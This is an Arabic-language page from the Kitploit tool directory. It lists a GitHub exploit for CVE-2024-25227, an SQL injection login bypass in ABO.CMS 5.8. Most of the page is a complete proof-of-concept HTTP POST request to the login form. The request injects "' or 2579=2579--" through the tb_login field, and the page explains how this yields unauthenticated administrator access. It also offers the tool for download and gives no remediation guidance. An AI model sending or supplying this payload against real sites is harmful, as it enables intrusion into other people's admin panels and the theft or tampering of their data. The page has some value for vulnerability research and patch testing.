Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227 — استغلال حقن SQL في ABO.CMS 5.8 يتجاوز المصادقة عبر معامل tb_login، مما يمنح وصولاً غير مصادق إلى لوحة الإدارة. يتضمن طلب HTTP لإثبات المفهوم (PoC) مع الحمولة. | Kitploit
أدوات/GitHubGitHub/thetrueartist/abo.cms-exploit-unauthenticated-login-bypass-cve-2024-25227
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubthetrueartist/abo.cms-exploit-unauthenticated-login-bypass-cve-2024-25227

ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227

استغلال حقن SQL في ABO.CMS 5.8 يتجاوز المصادقة عبر معامل tb_login، مما يمنح وصولاً غير مصادق إلى لوحة الإدارة. يتضمن طلب HTTP لإثبات المفهوم (PoC) مع الحمولة.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
9منذ 2 سنواتلم تتم المراجعة بعد

ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227

CVE-2024-25227 إكسبلويت

CVE-2024-25227 هي ثغرة SQLi في ABO.CMS 5.8 اكتُشفت في المعامل "tb_login"

PoC:

POST /login.aspx HTTP/1.1

Host: localhost

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/535.36 (KHTML, like Gecko) Chrome/104.0.5735.134 Safari/527.36

Connection: close

Cache-Control: max-age=0

Cookie: ASP.NET_SessionId=asd123hstjj

Origin: http://localhost

Upgrade-Insecure-Requests: 1

Referer: http://ip

Content-Type: application/x-www-form-urlencoded

Content-Length: 100

VIEWSTATE=%2ASDkjdkjfkgajsslfk&EVENTVALIDATION=%2;llkfopkorjaeitjru123&tb_login=27872164'%20or%202579%3d2579--%20&tb_pwd=hf%36nb4u%84X5&b_submit=+%C3+%D7+%CE+%C5+

التفاصيل

الحمولة هي tb_login=27872164'%20or%202579%3d2579--%20، وهذا بدون ترميز URL هو: 27872164' or 2579=2579--

من خلال الطلب المُعدَّل بالحمولة، فأنت تُخبر الخادم الخلفي بأن العنصر النائب "27872164'" يُدمج مع شرط يُقيَّم دائمًا على أنه صحيح ("2579=2579")، مع التعليق على ما تبقى من الاستعلام باستخدام "--" لضمان حقن الاستعلام المعدّل.

يؤدي هذا إلى تجاوز جميع فحوصات المصادقة المرتبطة بحقل "tb_login"، مما يسمح بالوصول غير المصادق إلى لوحة التحكم بصلاحيات المدير.

تنزيل الأداة